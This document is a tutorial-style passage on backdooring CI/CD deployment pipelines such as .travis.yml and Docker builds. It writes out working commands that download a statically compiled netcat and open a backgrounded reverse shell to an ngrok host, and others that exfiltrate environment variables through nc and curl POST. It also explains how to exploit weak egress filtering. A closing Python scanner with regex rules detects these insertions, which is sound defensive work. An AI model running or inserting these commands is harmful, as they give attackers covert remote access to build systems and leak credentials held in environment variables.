Deployment Pipeline

Whether the insertion goes into a .travis.yml file, the configuration of a different build system, or a Docker backdoor, a short addition could perform the following tasks:

- Download a backdoor shell, such as a statically compiled Netcat (or Ncat) binary

- Execute a backdoor listener in the background

# curl http://github.com/<repo>/netcat -o /usr/bin/netcat
# nc 123abc.ngrok.io 1234 -e /bin/bash &

If you have a payload on a system, you can always push data back:

# export STUFF=`env`; echo "$STUFF" | nc -w 5 123abc.ngrok.io 1234
# export STUFF=`env`; curl -X POST http://123abc.ngrok.io:1234 --data "$STUFF"

Since most systems include curl (or can be made to include it), you have a few options for making these pieces work together. You could use curl, which is available in practically every distribution, to bring down other binaries, such as Netcat, Ncat, or some other backdoor. These tools can be statically compiled ahead of time so that you have a stable and consistent toolset with no dependence on the target's libraries or on any number of deprecated features. For example, the Netcat shipped with most Linux distributions, if it is even part of the standard build, cannot execute a shell; bringing your own version restores that functionality. Build and container systems typically allow egress traffic without restriction. While this is starting to change, plenty of unsecured workloads exist today, and many more are still being created with insufficient egress filtering.

Below is an example that can be used for testing.

The curl line below pulls from raw.githubusercontent.com, out of the mosesrenegade tools-repo. That repo contains a 32-bit, statically compiled, portable copy of netcat. The statically compiled binary is designed to work with the same OS kernel and version as the target, so keep this in mind.

curl https://raw.githubusercontent.com/mosesrenegade/tools-repo/master/statically-compiled/nc -o /usr/local/bin/nc; chmod a+x /usr/local/bin/nc; /usr/local/bin/nc 123abc.ngrok.io 1234 -e /bin/bash &

Using the new binary, this creates a background netcat process attached to /bin/bash. This is just one example of bringing down tools; many other tools can be fetched the same way, and you can also build a multitude of netcat-like shells without downloading Netcat at all.
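From the defender's side, the pipeline insertion and env push-back described above leave recognisable traces in the CI configuration itself. The following Python scanner is an added example, not code from the original page, that applies a handful of assumed review rules to a constructed .travis.yml fragment (the repository, hostnames and rule patterns are illustrative assumptions):

```python
import re

# Constructed sample .travis.yml fragment (an assumption for this example, not a
# real repository): two ordinary steps plus the kind of inserted lines the text
# describes, a static-binary download with a backgrounded listener, and an env
# push-back to a tunnel host.
SAMPLE_TRAVIS_YML = """\
language: python
script:
  - pip install -r requirements.txt
  - pytest
  - curl https://raw.githubusercontent.com/example/tools-repo/master/nc -o /usr/local/bin/nc; chmod a+x /usr/local/bin/nc; /usr/local/bin/nc 123abc.ngrok.io 1234 -e /bin/bash &
after_success:
  - export STUFF=`env`; curl -X POST http://123abc.ngrok.io:1234 --data "$STUFF"
"""

# Review rules (assumed patterns, tuned to the page's examples): each is a name
# and a regex applied to one command line from the pipeline config.
RULES = [
    ("download-to-bin", re.compile(r"\b(curl|wget)\b.*\s-[oO]\s*/usr/(local/)?bin/")),
    ("nc-exec-shell", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s*/bin/(ba)?sh\b")),
    ("backgrounded-cmd", re.compile(r"&\s*$")),
    ("tunnel-domain", re.compile(r"\b[\w.-]+\.ngrok\.io\b")),
    ("env-dump", re.compile(r"`env`|\$\(env\)")),
]

def extract_commands(yaml_text):
    """Return the shell commands found in YAML list items ('- cmd')."""
    cmds = []
    for line in yaml_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("- "):
            cmds.append(stripped[2:].strip())
    return cmds

def scan(yaml_text):
    """Map each command that trips at least one rule to the list of rule names."""
    findings = {}
    for cmd in extract_commands(yaml_text):
        hits = [name for name, rx in RULES if rx.search(cmd)]
        if hits:
            findings[cmd] = hits
    return findings

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_TRAVIS_YML).items():
        print(f"{', '.join(hits)}: {cmd}")
```

Run as a pre-merge check on CI config changes, a hit on several rules at once (download into a bin directory, nc with -e, a backgrounded command, a tunnel hostname) is a much stronger signal than any single rule.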
